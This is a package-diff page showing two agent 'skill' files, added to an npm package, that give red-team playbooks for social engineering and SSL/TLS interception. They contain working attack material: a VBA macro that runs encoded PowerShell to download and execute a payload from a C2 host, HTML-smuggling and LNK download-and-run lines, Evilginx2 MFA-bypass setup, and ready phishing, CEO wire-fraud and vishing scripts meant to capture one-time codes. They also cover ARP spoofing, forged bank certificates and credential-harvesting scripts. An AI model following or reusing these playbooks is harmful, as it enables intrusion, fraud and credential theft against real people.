npm - rtexit-method - Versions diffs - 0.1.3 → 0.1.5 - Mend

rtexit-method 0.1.3 → 0.1.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (18) hide show

package/packaged-assets/.agents/skills/rt-social-engineering/SKILL.md ADDED Viewed

@@ -0,0 +1,401 @@
+---
+name: rt-social-engineering
+description: "Social engineering master skill for authorized red team engagements. Phishing lure crafting (HTML clone, credential harvest, macro payloads), spear phishing with OSINT targeting, email spoofing and DMARC bypass, BEC (Business Email Compromise) chain development, vishing scripts with pretext development, pretexting for physical access, and GoPhish campaign setup. Use when the engagement scope includes human-factor testing."
+---
+# rt-social-engineering — Social Engineering Master Skill
+## Overview
+Social engineering is exploiting human psychology rather than technical vulnerabilities. In red team engagements, it is often the fastest path to initial access — a single clicked link bypasses years of perimeter hardening. This skill covers end-to-end social engineering campaign planning, execution, and documentation.
+**Covers:**
+- Phishing (email-based credential harvest and payload delivery)
+- Spear Phishing (targeted, OSINT-driven)
+- Business Email Compromise (BEC)
+- Vishing (phone-based)
+- Smishing (SMS-based)
+- Pretexting for physical access
+- Campaign infrastructure setup (GoPhish, Evilginx2, Modlishka)
+**Authorization note:** Every technique here requires explicit written scope. ROE must specify: allowed targets, allowed domains, allowed lure types, and notification procedures if a target reports the test.
+---
+## Phase 1 — Target Profiling (OSINT-Driven)
+Before crafting any lure, build the target profile.
+```bash
+# Email harvesting — find employee emails
+theHarvester -d corp.com -l 500 -b google,bing,linkedin,hunter
+# Cross-reference with LinkedIn
+python3 linkedin2username.py -u 'attacker@gmail.com' -c 'Target Company' -n 5
+# Find org chart structure (who reports to who)
+# LinkedIn advanced search → "Target Company" → filter by department
+# Identify: IT admins, finance team, executives, HR
+# Find names + email format
+curl "https://hunter.io/api/v2/domain-search?domain=corp.com&api_key=KEY"
+# Reveals: {first}.{last}@corp.com or {first}{last}@corp.com
+# Find recent news / events (pretext material)
+site:corp.com filetype:pdf OR filetype:docx  # leaked documents
+site:linkedin.com "Target Company" "we are hiring"  # hiring events = IT changes
+"Target Company" "new office" OR "system migration" OR "security update"  # pretext hooks
+```
+---
+## Phase 2 — Infrastructure Setup
+### 2a — Domain Setup (Lookalike / Typosquatting)
+```bash
+# Find available typosquats
+dnstwist corp.com --format csv | head -20
+# Examples: c0rp.com, corp-security.com, corp-helpdesk.com, corpsupport.com
+# Register domain (use privacy protection)
+# Set up DNS: A record → phishing server, MX → mail server
+# Configure SPF, DKIM, DMARC to appear legitimate
+# SPF: "v=spf1 ip4:YOUR_IP ~all"
+# DKIM: generate keys → add TXT record
+# DMARC: "v=DMARC1; p=none; rua=mailto:you@yourinfra.com"
+# p=none = reports only, no rejection → maximizes delivery
+```
+### 2b — GoPhish Campaign Server
+```bash
+# Install GoPhish
+wget https://github.com/gophish/gophish/releases/latest/download/gophish-linux-64bit.zip
+unzip gophish-linux-64bit.zip && chmod +x gophish
+# Edit config.json
+{
+  "admin_server": {"listen_url": "127.0.0.1:3333", "use_tls": true},
+  "phish_server": {"listen_url": "0.0.0.0:443", "use_tls": true,
+                   "cert_path": "/etc/letsencrypt/live/corp-helpdesk.com/fullchain.pem",
+                   "key_path":  "/etc/letsencrypt/live/corp-helpdesk.com/privkey.pem"}
+}
+./gophish &
+# Access admin: https://127.0.0.1:3333 (SSH tunnel if needed)
+```
+### 2c — Evilginx2 (Reverse Proxy Phishing — Bypasses MFA)
+```bash
+# Evilginx2 captures session cookies even with MFA enabled
+git clone https://github.com/kgretzky/evilginx2
+cd evilginx2 && go build
+./evilginx2 -p ./phishlets -c /root/.evilginx
+# Configure domain
+config domain corp-helpdesk.com
+config ip YOUR_SERVER_IP
+# Load phishlet (pre-built for Microsoft 365, Google, etc.)
+phishlets hostname o365 corp-helpdesk.com
+phishlets enable o365
+# Create lure
+lures create o365
+lures get-url 0
+# Output: https://corp-helpdesk.com/login → captures session token
+```
+---
+## Phase 3 — Credential Harvest Phishing
+### 3a — Clone Target Login Page
+```bash
+# Clone with httrack
+httrack https://corp.com/login -O ./clone/ "+*.corp.com" -v
+# Or use SET (Social Engineering Toolkit)
+setoolkit
+# 1) Social Engineering Attacks
+# 2) Website Attack Vectors
+# 3) Credential Harvester Attack Method
+# 2) Site Cloner
+# Enter URL to clone: https://login.microsoftonline.com
+# Modify cloned page — redirect credentials to your server
+# In index.html: change form action to your collector endpoint
+```
+### 3b — Email Template (Microsoft 365 Password Expiry — High Open Rate)
+```
+Subject: [Action Required] Your Microsoft 365 password expires in 24 hours
+From: IT-Security <no-reply@corp-helpdesk.com>
+To: victim@corp.com
+Dear [First Name],
+Your Microsoft 365 account password is scheduled to expire in 24 hours.
+To avoid interruption to your email and Teams access, please update your
+password immediately using the link below:
+  ► Update Password Now → https://corp-helpdesk.com/renew
+If you have already updated your password, please disregard this message.
+IT Security Team
+Corp Technology Services
+```
+### 3c — Send Campaign (GoPhish)
+```
+GoPhish Setup:
+1. Sending Profile: SMTP relay (SendGrid, Amazon SES, or self-hosted Postfix)
+2. Email Template: paste crafted template, add {{.FirstName}} {{.LastName}} tokens
+3. Landing Page: import cloned login page, capture submitted data
+4. Target Group: import CSV (first,last,email,position)
+5. Campaign: link all 4 → launch → monitor results
+```
+---
+## Phase 4 — Payload Delivery Phishing
+### 4a — Office Macro Payload (VBA)
+```vba
+' Word/Excel macro — execute on document open
+Sub AutoOpen()
+    AutoRun
+End Sub
+Sub AutoRun()
+    Dim cmd As String
+    cmd = "powershell -WindowStyle Hidden -EncodedCommand " & _
+          "JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAEMAMgAvAHMAaABlAGwAbAAuAGUAeABlACcALAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAcwBoAGUAbABsAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAGgAZQBsAGwALgBlAHgAZQAnAA=="
+    Shell "cmd.exe /c " & cmd, vbHide
+End Sub
+```
+### 4b — HTML Smuggling (Bypass Email Filters)
+```html
+<!-- Payload assembles in browser — not scanned by email gateways -->
+<html><body>
+<script>
+  const b64 = "TVqQAAMAAAAEAAAA...";  // base64 encoded exe
+  const blob = new Blob([Uint8Array.from(atob(b64), c => c.charCodeAt(0))],
+    {type: "application/octet-stream"});
+  const a = document.createElement('a');
+  a.href = URL.createObjectURL(blob);
+  a.download = "Invoice_2026.exe";
+  document.body.appendChild(a);
+  a.click();
+</script>
+<p>Your invoice is downloading...</p>
+</body></html>
+```
+### 4c — ISO / LNK File (Modern Delivery — No Mark-of-the-Web)
+```bash
+# ISO bypasses MOTW — contents not scanned by Defender
+# Create ISO containing: LNK file + hidden payload
+# LNK target:
+# cmd.exe /c start /min powershell -w hidden -c "iwr http://C2/s.exe -o $env:TEMP\s.exe; & $env:TEMP\s.exe"
+# Package into ISO
+mkisofs -o invoice.iso ./payload_folder/
+# Email as attachment: "Invoice_2026.iso"
+# User double-clicks ISO (mounts it) → sees Invoice.lnk → clicks → payload runs
+```
+---
+## Phase 5 — Business Email Compromise (BEC)
+### 5a — CEO / CFO Fraud Chain
+```
+STEP 1 — Reconnaissance
+- Identify CEO name: LinkedIn, company website
+- Identify CFO / Finance Manager: LinkedIn
+- Find CEO email format from OSINT: john.smith@corp.com
+STEP 2 — Lookalike email setup
+- Register: john.smith@c0rp.com OR john.smith@corp-int.com
+- Configure reply-to: actual CEO email (to monitor replies)
+STEP 3 — Initial contact (CEO → CFO)
+Subject: Confidential — Time Sensitive
+Hi Sarah,
+I'm currently in a board meeting and need your urgent assistance with a
+wire transfer. This is related to a confidential acquisition — please do
+not discuss with anyone else until we speak.
+Can you handle a $47,000 transfer today? I'll call you after 3pm to
+discuss. Please confirm you received this.
+John
+STEP 4 — Follow-up pressure (if no response)
+Subject: Re: Confidential — Time Sensitive
+Sarah, please confirm. The window for this deal closes at 5pm EST.
+The legal team is waiting on our end.
+J.
+STEP 5 — Wire instructions (after target confirms)
+Provide attacker-controlled bank account details.
+In real engagements: use a controlled test account, document instead.
+```
+### 5b — IT Helpdesk Impersonation → Credential Theft
+```
+From: it-helpdesk@corp-support.com
+To: employee@corp.com
+Subject: Mandatory Security Update — Action Required by EOD
+Hi [Name],
+Our security team has detected unusual login activity on your account
+from an unrecognized device (Windows 11, Chicago, IL).
+To secure your account, please verify your identity here:
+https://corp-helpdesk.com/verify  [GoPhish / Evilginx link]
+If you did not attempt to log in, your account may be compromised.
+Please act within 2 hours to avoid account suspension.
+IT Security — Corp Technology
+```
+---
+## Phase 6 — Vishing (Phone Social Engineering)
+### 6a — IT Helpdesk → Password Reset
+```
+PRETEXT: IT Helpdesk calling about security issue
+[Script]
+"Hi, this is [Name] from the IT Security team. I'm calling regarding
+your account — we've flagged some suspicious activity in our monitoring
+system this morning.
+We're seeing failed login attempts from [made-up IP/location].
+I need to verify your identity and walk you through a quick security check.
+Can you confirm your employee ID for me? ...
+Great. And what email address do you have on file? ...
+Perfect. I'm going to send you a verification code right now —
+can you read that back to me when you receive it?"
+[Goal: get MFA OTP code in real-time → log in simultaneously]
+```
+### 6b — Finance / Wire Fraud Call
+```
+PRETEXT: Executive assistant calling on behalf of CEO
+"Hi, this is [Name], executive assistant to [CEO Name].
+[CEO] asked me to follow up on an email he sent you earlier today
+regarding a confidential transaction.
+Were you able to review his email? ... He's in meetings all day
+but wanted to make sure this gets processed before the close of business.
+He mentioned he'll approve the transaction code verbally —
+can I ask what system you use to process wire transfers? ..."
+```
+---
+## Phase 7 — Pretexting for Physical Access
+```
+SCENARIO A — Delivery Person
+Materials: clipboard, package box, high-visibility vest
+Script: "Delivery for [name from LinkedIn] in IT. They asked me to
+bring it directly up — do you know where the server room is?"
+SCENARIO B — IT Contractor
+Materials: polo shirt, laptop bag, printed "work order"
+Script: "Hi, I'm here from [MSP/vendor name from OSINT] to service
+the [server/network equipment] in rack 3B. I have a work order —
+can you badge me in? My access card hasn't been provisioned yet."
+SCENARIO C — New Employee
+Materials: company-branded printouts, laptop
+Script: "Hi, I just started this week on the [department] team —
+I'm trying to find my desk. Do you know where [manager name from LinkedIn] sits?"
+```
+---
+## Campaign Metrics & Reporting
+```
+Key metrics to capture:
+- Open rate: emails opened / emails sent
+- Click rate: links clicked / emails opened
+- Credential submission rate: forms submitted / links clicked
+- Payload execution rate: payloads run / payloads delivered
+- Report rate: targets who reported the phish to IT
+GoPhish exports CSV with all events.
+Document in rt-finding-document with:
+  - CWE-1021 (Improper Restriction of Rendered UI Layers)
+  - MITRE ATT&CK: T1566 (Phishing), T1598 (Phishing for Info)
+  - Business impact: X% of employees surrendered credentials
+```
+---
+## Skill Levels
+**BEGINNER:**
+- GoPhish with cloned Microsoft 365 login page
+- Generic credential harvest campaign
+**INTERMEDIATE:**
+- OSINT-driven spear phishing with personalized lures
+- Evilginx2 for MFA bypass
+- ISO/LNK payload delivery
+**ADVANCED:**
+- BEC chain (CEO fraud, wire transfer)
+- Vishing + simultaneous MFA capture
+- Multi-stage campaigns (build rapport over days)
+**EXPERT:**
+- Combining phishing initial access + physical tailgating
+- Custom implant delivery via HTML smuggling
+- Long-term pretexting (weeks-long persona building)
+---
+## References
+- GoPhish: https://getgophish.com
+- Evilginx2: https://github.com/kgretzky/evilginx2
+- Social Engineering Toolkit: https://github.com/trustedsec/social-engineer-toolkit
+- MITRE ATT&CK T1566: https://attack.mitre.org/techniques/T1566/
+- PayloadsAllTheThings/Phishing: https://github.com/swisskyrepo/PayloadsAllTheThings

package/packaged-assets/.agents/skills/rt-ssl-mitm/SKILL.md ADDED Viewed

@@ -0,0 +1,305 @@
+---
+name: rt-ssl-mitm
+description: "SSL/TLS interception and Man-in-the-Middle skill for authorized engagements. mitmproxy transparent proxy setup, Burp Suite MITM configuration, custom CA certificate injection, SSL stripping with SSLstrip2, HSTS bypass, certificate pinning bypass (mobile/desktop), TLS downgrade attacks, and traffic decryption workflows. Use when testing HTTPS applications, intercepting mobile app traffic, or demonstrating insecure TLS configurations."
+---
+# rt-ssl-mitm — SSL/TLS Interception & Man-in-the-Middle
+## Overview
+SSL/TLS MITM attacks intercept encrypted HTTPS traffic between a client and server. In authorized red team engagements, this demonstrates: weak certificate validation, missing HSTS, bypassable certificate pinning, insecure TLS configurations, and cleartext credential exposure after decryption.
+**Attack scenarios:**
+- Intercept mobile app traffic (no certificate pinning)
+- Demonstrate SSL stripping on internal network
+- Forge certificates to impersonate internal services
+- Decrypt TLS traffic for credential harvesting
+- TLS downgrade to expose weak cipher suites
+---
+## Prerequisites
+```bash
+# Install tools
+pip3 install mitmproxy
+apt install sslstrip2 bettercap wireshark tcpdump -y
+# Burp Suite Pro/Community — https://portswigger.net/burp
+# mitmproxy — https://mitmproxy.org
+```
+---
+## Method 1 — mitmproxy (Full HTTPS Interception)
+### 1a — Transparent Proxy (No client config needed — network position)
+```bash
+# Enable IP forwarding
+echo 1 > /proc/sys/net/ipv4/ip_forward
+# ARP spoof target (position yourself between target and gateway)
+arpspoof -i eth0 -t TARGET_IP GATEWAY_IP &
+arpspoof -i eth0 -t GATEWAY_IP TARGET_IP &
+# Redirect HTTP and HTTPS to mitmproxy
+iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80  -j REDIRECT --to-port 8080
+iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
+# Start mitmproxy in transparent mode
+mitmproxy --mode transparent --showhost
+# Or mitmdump (no UI — log to file)
+mitmdump --mode transparent --showhost -w traffic.mitm
+# View captured traffic
+mitmproxy -r traffic.mitm
+```
+### 1b — Regular Proxy Mode (Configure browser/app to use proxy)
+```bash
+# Start mitmproxy
+mitmproxy -p 8080
+# Or with web UI
+mitmweb -p 8080
+# Access: http://127.0.0.1:8081
+# Install mitmproxy CA cert on target device
+# CA cert location: ~/.mitmproxy/mitmproxy-ca-cert.pem
+# Android: Settings → Security → Install from storage
+# iOS: Settings → General → Profile → Install
+# Windows: certmgr.msc → Trusted Root CAs → Import
+# Linux: cp mitmproxy-ca-cert.pem /usr/local/share/ca-certificates/ && update-ca-certificates
+```
+### 1c — mitmproxy Scripts (Extract credentials automatically)
+```python
+# cred_extractor.py — auto-extract POST credentials
+from mitmproxy import http
+import re
+def request(flow: http.HTTPFlow):
+    if flow.request.method == "POST":
+        body = flow.request.get_text()
+        # Extract common credential patterns
+        patterns = [
+            r'(password|passwd|pass|pwd)=([^&\s]+)',
+            r'(username|user|login|email)=([^&\s]+)',
+            r'"(password|token|api_key)"\s*:\s*"([^"]+)"',
+        ]
+        for p in patterns:
+            for m in re.findall(p, body, re.IGNORECASE):
+                print(f"[CRED] {flow.request.host} | {m[0]}={m[1]}")
+        # Log all POST to file
+        with open("/tmp/posts.log", "a") as f:
+            f.write(f"\n=== {flow.request.host}{flow.request.path} ===\n{body}\n")
+```
+```bash
+# Run with script
+mitmproxy -p 8080 -s cred_extractor.py
+```
+---
+## Method 2 — Burp Suite MITM
+```bash
+# Start Burp Suite → Proxy → Options
+# Bind: 0.0.0.0:8080 (all interfaces)
+# Import Burp CA: http://burpsuite/cert → download → install on target
+# Intercept all HTTPS from target network
+# Add upstream proxy chain if needed:
+# User Options → Connections → Upstream Proxy → add target network gateway
+# Burp invisible proxy (for non-proxy-aware clients)
+# Proxy → Options → Edit listener → Request Handling
+# ☑ Support invisible proxying
+# Add iptables redirect rules (same as mitmproxy transparent)
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
+```
+---
+## Method 3 — SSL Stripping (HTTP Downgrade)
+```bash
+# SSLstrip2 + bettercap — downgrades HTTPS to HTTP even with HSTS (partially)
+# Method A: bettercap (modern, all-in-one)
+bettercap -iface eth0
+# In bettercap console:
+net.probe on                    # Discover hosts
+set arp.spoof.targets TARGET_IP
+arp.spoof on                    # Position as MITM
+set net.sniff.verbose true
+net.sniff on                    # Capture traffic
+https.proxy on                  # SSL strip
+# Method B: sslstrip2
+python3 sslstrip2.py -l 10000 -w stripped.log
+iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
+# HSTS bypass technique: rename www.target.com → wwww.target.com (extra w)
+# If HSTS not pinned to subdomains, works on some sites
+```
+---
+## Method 4 — Custom CA Certificate Forgery
+```bash
+# Generate your own CA
+openssl genrsa -out myCA.key 4096
+openssl req -x509 -new -nodes -key myCA.key -sha256 -days 1825 \
+  -out myCA.pem \
+  -subj "/C=US/ST=NY/O=Corp IT/CN=Corp Internal CA"
+# Sign a fake certificate for any domain
+openssl genrsa -out fake.key 2048
+openssl req -new -key fake.key -out fake.csr \
+  -subj "/CN=login.bank.com/O=Bank Corp/C=US"
+openssl x509 -req -in fake.csr -CA myCA.pem -CAkey myCA.key \
+  -CAcreateserial -out fake.crt -days 365 -sha256 \
+  -extfile <(printf "subjectAltName=DNS:login.bank.com,DNS:*.bank.com")
+# Configure nginx to serve with fake cert
+server {
+    listen 443 ssl;
+    server_name login.bank.com;
+    ssl_certificate /path/to/fake.crt;
+    ssl_certificate_key /path/to/fake.key;
+    location / { proxy_pass https://real-login.bank.com; }
+}
+# If target has your CA installed → no browser warning
+```
+---
+## Method 5 — TLS Configuration Audit & Downgrade
+```bash
+# Test TLS configuration of target
+testssl.sh https://target.com
+# Checks: supported versions, cipher suites, HSTS, HPKP, certificate issues
+# Check for weak ciphers
+nmap --script ssl-enum-ciphers -p 443 target.com
+# Look for: SSLv3, TLSv1.0, TLSv1.1, RC4, DES, EXPORT ciphers
+# Check certificate details
+openssl s_client -connect target.com:443 -showcerts 2>/dev/null | openssl x509 -noout -text
+# Look for: SHA1 signature, weak key size (<2048), expired, wrong SAN
+# TLS downgrade test
+openssl s_client -connect target.com:443 -tls1    # Force TLS 1.0
+openssl s_client -connect target.com:443 -ssl3    # Force SSLv3 (POODLE)
+openssl s_client -connect target.com:443 -cipher RC4-SHA  # Force RC4
+# BEAST/POODLE/DROWN scanner
+python3 test-rc4.py target.com
+```
+---
+## Method 6 — Certificate Pinning Bypass
+```bash
+# Mobile apps pin the server certificate — MITM fails without bypass
+# See also: rt-exploit-android / rt-exploit-ios for Frida-based bypass
+# Universal pinning bypass (Frida)
+frida -U -f com.target.app --no-pause -s ssl-pinning-bypass.js
+# Scripts: github.com/httptoolkit/frida-interception-and-unpinning
+# objection (easier)
+objection -g com.target.app explore
+objection> android sslpinning disable
+objection> ios sslpinning disable
+# Desktop apps (Charles/mitmproxy CA install + bypass)
+# Electron: nodeIntegration=true → patch tlsSocket
+# .NET: add custom CertificateValidationCallback returning true
+# Java: override TrustManager to accept all certs
+```
+---
+## Method 7 — Network-Wide Interception (Internal Red Team)
+```bash
+# Full internal network MITM — intercept all HTTPS traffic on subnet
+# Step 1 — ARP spoof entire subnet (use carefully — can cause DoS)
+bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.0/24; arp.spoof on; net.sniff on"
+# Step 2 — Redirect all HTTPS to mitmproxy
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8080
+mitmproxy --mode transparent
+# Step 3 — Parse captured traffic
+mitmdump -r traffic.mitm -q --flow-detail 3 | grep -i "password\|token\|Authorization"
+# Step 4 — Extract credentials from MITM dump
+python3 << 'EOF'
+from mitmproxy.io import FlowReader
+with open("traffic.mitm", "rb") as f:
+    reader = FlowReader(f)
+    for flow in reader.stream():
+        if hasattr(flow, 'request') and flow.request.method == "POST":
+            print(f"HOST: {flow.request.host}")
+            print(f"BODY: {flow.request.get_text()[:500]}")
+            print("---")
+EOF
+```
+---
+## Skill Levels
+**BEGINNER:** Burp Suite proxy + install CA cert → intercept browser traffic
+**INTERMEDIATE:** mitmproxy transparent proxy + ARP spoof → network-wide interception + credential extraction script
+**ADVANCED:** SSL stripping with bettercap + HSTS bypass + certificate forgery for internal services
+**EXPERT:** Custom mitmproxy scripts for automated credential harvesting + TLS fingerprint analysis + certificate pinning bypass on hardened apps
+---
+## Findings Documentation
+```
+Finding: SSL/TLS Interception Possible
+Severity: HIGH
+CVSS: 7.4 (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
+MITRE: T1557.002 (ARP Cache Poisoning), T1040 (Network Sniffing)
+Evidence:
+- Screenshot of intercepted credentials in mitmproxy
+- List of hosts with no HSTS or HPKP
+- TLS version support matrix from testssl.sh
+Remediation:
+- Enforce HSTS with max-age=31536000; includeSubDomains; preload
+- Implement certificate pinning in mobile/desktop apps
+- Disable TLS 1.0/1.1 and weak cipher suites
+- Deploy 802.1X on internal network to prevent ARP spoofing
+```
+---
+## References
+- mitmproxy docs: https://docs.mitmproxy.org
+- bettercap: https://www.bettercap.org
+- testssl.sh: https://github.com/drwetter/testssl.sh
+- MITRE T1557: https://attack.mitre.org/techniques/T1557/